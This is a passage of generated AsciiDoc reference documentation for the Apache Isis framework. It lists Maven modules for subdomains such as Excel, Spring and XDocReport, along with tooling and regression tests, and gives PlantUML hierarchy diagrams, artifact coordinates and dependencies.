PDF Box Library\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Zip (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-zip\nType: pom\nDirectory: \/subdomains\/zip\n----\n|A domain service for Apache Isis', for zipping utilities.\n\n|Apache Isis Sub - Zip (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-zip-applib\nType: jar\nDirectory: \/subdomains\/zip\/applib\n----\n|.Components\n****\no.a.i.extensions.zip.dom.impl.ZipService +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== Base\n\n[plantuml,Base,svg]\n----\n@startuml(id=Base)\ntitle Base - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Base\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Base (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Base (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Base)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Base (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-base\nType: pom\nDirectory: \/subdomains\/base\n----\n|A module providing Base utilities for other subdomain modules\n\n|Apache Isis Sub - Base (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-base-applib\nType: jar\nDirectory: \/subdomains\/base\/applib\n----\n|.Components\n****\no.a.i.subdomains.base.applib.services.calendar.CalendarService +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/base\/applib\/Chained.adoc[Chained], xref:refguide:subdomains:index\/base\/applib\/Dflt.adoc[Dflt], xref:refguide:subdomains:index\/base\/applib\/IsisModuleSubdomainsBaseApplib.adoc[IsisModuleSubdomainsBaseApplib], xref:refguide:subdomains:index\/base\/applib\/PowerType.adoc[PowerType], xref:refguide:subdomains:index\/base\/applib\/Titled.adoc[Titled], xref:refguide:subdomains:index\/base\/applib\/TitledEnum.adoc[TitledEnum], xref:refguide:subdomains:index\/base\/applib\/services\/BaseServicesModule.adoc[BaseServicesModule], xref:refguide:subdomains:index\/base\/applib\/services\/calendar\/CalendarService.adoc[CalendarService], xref:refguide:subdomains:index\/base\/applib\/types\/DescriptionType.adoc[DescriptionType], xref:refguide:subdomains:index\/base\/applib\/types\/FqcnType.adoc[FqcnType], xref:refguide:subdomains:index\/base\/applib\/types\/MoneyType.adoc[MoneyType], xref:refguide:subdomains:index\/base\/applib\/types\/NameType.adoc[NameType], xref:refguide:subdomains:index\/base\/applib\/types\/NotesType.adoc[NotesType], xref:refguide:subdomains:index\/base\/applib\/types\/ObjectIdentifierType.adoc[ObjectIdentifierType], xref:refguide:subdomains:index\/base\/applib\/types\/PercentageType.adoc[PercentageType], xref:refguide:subdomains:index\/base\/applib\/types\/ProperNameType.adoc[ProperNameType], xref:refguide:subdomains:index\/base\/applib\/types\/ReferenceType.adoc[ReferenceType], xref:refguide:subdomains:index\/base\/applib\/types\/TitleType.adoc[TitleType], xref:refguide:subdomains:index\/base\/applib\/types\/UrlTemplateType.adoc[UrlTemplateType], xref:refguide:subdomains:index\/base\/applib\/types\/UserNameType.adoc[UserNameType], xref:refguide:subdomains:index\/base\/applib\/types\/XxxType.adoc[XxxType], xref:refguide:subdomains:index\/base\/applib\/utils\/ClassUtils.adoc[ClassUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/JodaPeriodUtils.adoc[JodaPeriodUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/MathUtils.adoc[MathUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/MessageUtils.adoc[MessageUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/StringUtils.adoc[StringUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/TitleBuilder.adoc[TitleBuilder], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/AbstractInterval.adoc[AbstractInterval], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/LocalDateInterval.adoc[LocalDateInterval], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/VT.adoc[VT], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeComparable.adoc[WithCodeComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeGetter.adoc[WithCodeGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeUnique.adoc[WithCodeUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionComparable.adoc[WithDescriptionComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionGetter.adoc[WithDescriptionGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionUnique.adoc[WithDescriptionUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithInterval.adoc[WithInterval], xref:refguide:subdomains:index\/base\/applib\/with\/WithIntervalContiguous.adoc[WithIntervalContiguous], xref:refguide:subdomains:index\/base\/applib\/with\/WithIntervalMutable.adoc[WithIntervalMutable], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameComparable.adoc[WithNameComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameGetter.adoc[WithNameGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameUnique.adoc[WithNameUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceComparable.adoc[WithReferenceComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceGetter.adoc[WithReferenceGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceUnique.adoc[WithReferenceUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithSequence.adoc[WithSequence], xref:refguide:subdomains:index\/base\/applib\/with\/WithStartDate.adoc[WithStartDate], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleComparable.adoc[WithTitleComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleGetter.adoc[WithTitleGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleUnique.adoc[WithTitleUnique]\n****\n|===\n\n=== Excel\n\n[plantuml,Excel,svg]\n----\n@startuml(id=Excel)\ntitle Excel - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Excel\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Excel (Fixtures)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Sub - Excel (Integ Tests)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Sub - Excel (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Excel (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Sub - Excel (testing support)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n}\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 6 : \"\"\n@enduml\n----\n.Projects\/Modules (Excel)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Excel (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel\nType: pom\nDirectory: \/subdomains\/excel\n----\n|A domain service for Apache Isis', allowing collections\nof (view model) objects to be exported\/imported to\/from an\nExcel spreadsheet. Also support for excel-based fixtures.\n\n|Apache Isis Sub - Excel (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-applib\nType: jar\nDirectory: \/subdomains\/excel\/applib\n----\n|.Components\n****\no.a.i.subdomains.excel.applib.dom.ExcelService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.poi:poi-ooxml:jar:<managed> +\norg.apache.poi:poi-ooxml-schemas:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/excel\/applib\/IsisModuleSubdomainsExcelApplib.adoc[IsisModuleSubdomainsExcelApplib], xref:refguide:subdomains:index\/excel\/applib\/dom\/AggregationType.adoc[AggregationType], xref:refguide:subdomains:index\/excel\/applib\/dom\/ExcelMetaDataEnabled.adoc[ExcelMetaDataEnabled], xref:refguide:subdomains:index\/excel\/applib\/dom\/ExcelService.adoc[ExcelService], xref:refguide:subdomains:index\/excel\/applib\/dom\/HyperLink.adoc[HyperLink], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotColumn.adoc[PivotColumn], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotDecoration.adoc[PivotDecoration], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotRow.adoc[PivotRow], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotValue.adoc[PivotValue], xref:refguide:subdomains:index\/excel\/applib\/dom\/RowHandler.adoc[RowHandler], xref:refguide:subdomains:index\/excel\/applib\/dom\/WorksheetContent.adoc[WorksheetContent], xref:refguide:subdomains:index\/excel\/applib\/dom\/WorksheetSpec.adoc[WorksheetSpec], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/AnnotationList.adoc[AnnotationList], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/AnnotationTriplet.adoc[AnnotationTriplet], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/ExcelFileBlobConverter.adoc[ExcelFileBlobConverter], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/ExcelServiceImpl.adoc[ExcelServiceImpl], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/Mode.adoc[Mode], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/PivotUtils.adoc[PivotUtils], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/SheetPivoter.adoc[SheetPivoter]\n****\n\n|Apache Isis Sub - Excel (Fixtures)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-fixtures\nType: jar\nDirectory: \/subdomains\/excel\/fixture\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-applib:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-testing:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Sub - Excel (Integ Tests)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-integtests\nType: jar\nDirectory: \/subdomains\/excel\/integtests\n----\n|.Dependencies\n****\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-fixtures:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n|Apache Isis Sub - Excel (testing support)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-testing\nType: jar\nDirectory: \/subdomains\/excel\/testing\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/excel\/testing\/ExcelFixture.adoc[ExcelFixture], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixture2.adoc[ExcelFixture2], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixtureRowHandler.adoc[ExcelFixtureRowHandler], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixtureWorkbookHandler.adoc[ExcelFixtureWorkbookHandler], xref:refguide:subdomains:index\/excel\/testing\/FixtureAwareRowHandler.adoc[FixtureAwareRowHandler], xref:refguide:subdomains:index\/excel\/testing\/IsisModuleSubdomainsExcelTesting.adoc[IsisModuleSubdomainsExcelTesting]\n****\n|===\n\n=== Spring\n\n[plantuml,Spring,svg]\n----\n@startuml(id=Spring)\ntitle Spring - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Spring\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Spring (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Spring (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Spring)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Spring (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-spring\nType: pom\nDirectory: \/subdomains\/spring\n----\n|Utility services for interacting with the Spring application context (that hosts the Apache Isis application itself)\n\n|Apache Isis Sub - Spring (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-spring-applib\nType: jar\nDirectory: \/subdomains\/spring\/applib\n----\n|.Components\n****\no.a.i.subdomains.spring.applib.service.SpringBeansService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/spring\/applib\/IsisModuleSubdomainsSpringApplib.adoc[IsisModuleSubdomainsSpringApplib], xref:refguide:subdomains:index\/spring\/applib\/service\/BeanDescriptor.adoc[BeanDescriptor], xref:refguide:subdomains:index\/spring\/applib\/service\/ContextBeans.adoc[ContextBeans], xref:refguide:subdomains:index\/spring\/applib\/service\/SpringBeansService.adoc[SpringBeansService]\n****\n|===\n\n=== XDocReport\n\n[plantuml,XDocReport,svg]\n----\n@startuml(id=XDocReport)\ntitle XDocReport - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"XDocReport\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - XdocReport (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - XdocReport (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (XDocReport)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - XdocReport (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-xdocreport\nType: pom\nDirectory: \/subdomains\/xdocreport\n----\n|Integrates XDoc Report Library\n\n|Apache Isis Sub - XdocReport (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-xdocreport-applib\nType: jar\nDirectory: \/subdomains\/xdocreport\/applib\n----\n|.Components\n****\no.a.i.subdomains.xdocreport.applib.service.XDocReportService +\n****\n\n.Dependencies\n****\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.converter.docx.xwpf:jar:<managed> +\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.document.docx:jar:<managed> +\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.template.freemarker:jar:<managed> +\nfr.opensagres.xdocreport:org.apache.poi.xwpf.converter.core:jar:<managed> +\nfr.opensagres.xdocreport:org.apache.poi.xwpf.converter.pdf:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/xdocreport\/applib\/IsisModuleSubdomainsXDocReportApplib.adoc[IsisModuleSubdomainsXDocReportApplib], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/OutputType.adoc[OutputType], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/XDocReportModel.adoc[XDocReportModel], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/XDocReportService.adoc[XDocReportService]\n****\n|===\n\n== Tooling\n\n[plantuml,Tooling,svg]\n----\n@startuml(id=Tooling)\ntitle Tooling - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Tooling\\n[Software System]\" {\n rectangle \"==Apache Isis - Tooling\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Tooling - C4 Modeling\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis - Tooling - CLI (Command Line Interface)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis - Tooling - Java Model (Code Mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis - Tooling - Java to Asciidoc (Code Mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis - Tooling - Model for AsciiDoc\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis - Tooling - Project Model (Code mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 8 : \"\"\n@enduml\n----\n.Projects\/Modules (Tooling)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis - Tooling\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling\nType: pom\nDirectory: \/tooling\n----\n|Libraries and tools not depending on the _Apache Isis Core_ ecosystem,\neg. code mining, automated documentation.\n(Targeted for JVM 11+)\n\n.Dependencies\n****\ncom.google.code.findbugs:annotations:jar:3.0.1u2 +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.mapstruct:mapstruct-processor:jar:1.4.2.Final +\norg.projectlombok:lombok:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +\n****\n\n|Apache Isis - Tooling - C4 Modeling\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-c4modeling\nType: jar\nDirectory: \/tooling\/c4modeling\n----\n|Library for programmatic C4 Model generation.\n\nSee https:\/\/c4model.com\/\n\n.Dependencies\n****\ncom.structurizr:structurizr-core:jar:<managed> +\ncom.structurizr:structurizr-plantuml:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\n****\n\n|Apache Isis - Tooling - CLI (Command Line Interface)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-cli\nType: jar\nDirectory: \/tooling\/cli\n----\n|Command Line Interface for the _Apache Isis Tooling_ ecosystem.\n\n.Dependencies\n****\ninfo.picocli:picocli:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-c4modeling:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-java2adoc:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-javamodel:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-projectmodel:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Java to Asciidoc (Code Mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-java2adoc\nType: jar\nDirectory: \/tooling\/java2adoc\n----\n|Code mining library for Java source to Asciidoc conversion.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-javamodel:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:<managed> +\norg.jsoup:jsoup:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Java Model (Code Mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-javamodel\nType: jar\nDirectory: \/tooling\/javamodel\n----\n|Code mining library for Java bytecode introspection.\n\n.Dependencies\n****\ncom.github.andi-huber:code-assert:jar:-SNAPSHOT +\ncom.github.javaparser:javaparser-core:jar:${javaparser.version} +\norg.apache.isis.commons:isis-commons:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Model for AsciiDoc\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-model4adoc\nType: jar\nDirectory: \/tooling\/model4adoc\n----\n|Library for programmatic AsciiDoc generation.\n\nThe AsciiDoc name is trademarked by the Eclipse Foundation (https:\/\/www.eclipse.org\/).\nThis project is *not* part of the specification effort for _AsciiDoc_ under the\nAsciiDoc Working Group. See https:\/\/projects.eclipse.org\/proposals\/asciidoc-language\nand https:\/\/accounts.eclipse.org\/mailing-list\/asciidoc-wg. However, we are happy to\nhelp with transfer of source code, if any project (under the umbrella of the\nAsciiDoc Working Group) is willing to take over.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.asciidoctor:asciidoctorj:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Project Model (Code mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-projectmodel\nType: jar\nDirectory: \/tooling\/projectmodel\n----\n|Code mining library for Gradle\/Maven project module tree introspection.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.maven:maven-model-builder:jar:<managed> +\norg.gradle:gradle-tooling-api:jar:<managed> +\n****\n|===\n\n== Regression Tests\n\n[plantuml,Regression Tests,svg]\n----\n@startuml(id=Regression_Tests)\ntitle Regression Tests - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Regression Tests\\n[Software System]\" {\n rectangle \"==Apache Isis - Regression Tests\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Regression Tests (stable)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Regression Tests)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis - Regression Tests\n[source,yaml]\n----\nGroup: org.apache.isis.regressiontests\nArtifact: isis-regressiontests\nType: pom\nDirectory: \/regressiontests\n----\n|Collection of JUnit tests covering core functionalities of the framework.\n(Targeted for JVM 11+)\n\n.Dependencies\n****\norg.apache.directory.server:apacheds-test-framework:jar:2.0.0.AM26 +\norg.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-shiro-realm-ldap-impl:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-restclient-applib:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jpa:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-specsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:${project.version} +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.glassfish:javax.json:jar:1.1.4 +\norg.glassfish.jersey.ext:jersey-spring5:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis - Regression Tests (stable)\n[source,yaml]\n----\nGroup: org.apache.isis.regressiontests\nArtifact: isis-regressiontests-stable\nType: jar\nDirectory: \/regressiontests\/stable\n----\n|.Components\n****\no.a.i.testdomain.applayer.ApplicationLayerTestFactory +\no.a.i.testdomain.applayer.ApplicationLayerTestFactory$PreCommitListener +\no.a.i.testdomain.applayer.publishing.CommandSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.EntityChangesSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.EntityPropertyChangeSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.ExecutionSubscriberForTesting +\no.a.i.testdomain.conf.Configuration_headless$HeadlessCommandSupport +\no.a.i.testdomain.jdo.JdoInventoryDao +\no.a.i.testdomain.jpa.JpaInventoryDao +\no.a.i.testdomain.jpa.springdata.EmployeeRepository +\no.a.i.testdomain.util.interaction.InteractionBoundaryProbe +\no.a.i.testdomain.util.kv.KVStoreForTesting +\no.a.i.testdomain.util.rest.RestEndpointService +\n****\n\n.Dependencies\n****\norg.apache.isis.extensions:isis-extensions-cors-impl:jar:<managed> +\norg.glassfish.jersey.ext:jersey-spring5:jar:<managed> +\n****\n|===\n\n== Incubator\n\n[plantuml,Incubator,svg]\n----\n@startuml(id=Incubator)\ntitle Incubator - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 